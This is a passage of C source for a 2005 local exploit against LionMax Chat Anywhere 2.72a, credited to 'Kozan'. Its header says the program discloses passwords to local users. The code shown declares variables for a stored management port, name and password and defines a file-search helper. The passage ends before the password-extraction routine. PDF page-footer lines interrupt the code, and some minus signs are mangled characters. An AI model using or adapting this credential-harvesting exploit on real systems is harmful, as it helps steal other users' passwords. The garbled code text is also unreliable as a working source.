1 /*****************************************************************
2
3 Chat Anywhere 2.72a Local Exploit by Kozan
4
5 Application: Chat Anywhere 2.72a
6 Vendor:LionMax Software
7 http://www.lionmax.com/
8
9 Vulnerable Description: Chat Anywhere 2.72a discloses passwords
10 to local users.
11
12 Discovered & Coded by: Kozan
13 Credits to ATmaCA
14 Web : www.netmagister.com
15 Web2: www.spyinstructors.com
16 Mail: kozan[at]netmagister[dot]com
17
18 *****************************************************************/
19
20 #include <windows.h>
21 #include <stdio.h>
22 #include <string.h>
23
24 #define BUFSIZE 100
25 HKEY hKey;
26 char prgfiles[BUFSIZE];
27 DWORD dwBufLen=BUFSIZE;
28 LONG lRet;
29
30 char *manage_port, *manage_name, *manage_password;
31
32 int adresal(char *FilePath,char *Str)
33 {
34 char kr;
35 int Sayac=0;
36 int Offset=−1;
37 FILE *di;
38 di=fopen(FilePath,"rb");
39
40 if( di == NULL )
41 {
42 fclose(di);
43 return −1;
44 }
45
46 while(!feof(di))
47 {
48 Sayac++;
49 for(int i=0;i<strlen(Str);i++)
50 {
51 kr=getc(di);
52 if(kr != Str[i])
Page 1/3
Chat Anywhere 2.72a Local Password Disclosure Exploit
Kozan
02/23/2005
53 {
54 if( i>0 )
55 {
56 fseek(di,Sayac+1,SEEK_SET);
57 }
58 break;
59 }
60 if( i > ( strlen(Str)−2 ) )
61 {
62 Offset = ftell(di)−strlen(Str);
63 fclose(di);
64 return Offset;
65 }
66 }
67 }
68 fclose(di);
69 return −1;
70 }
71
72 char *oku(char *FilePath,char *Str)
73 {
74
75 FILE *di;
76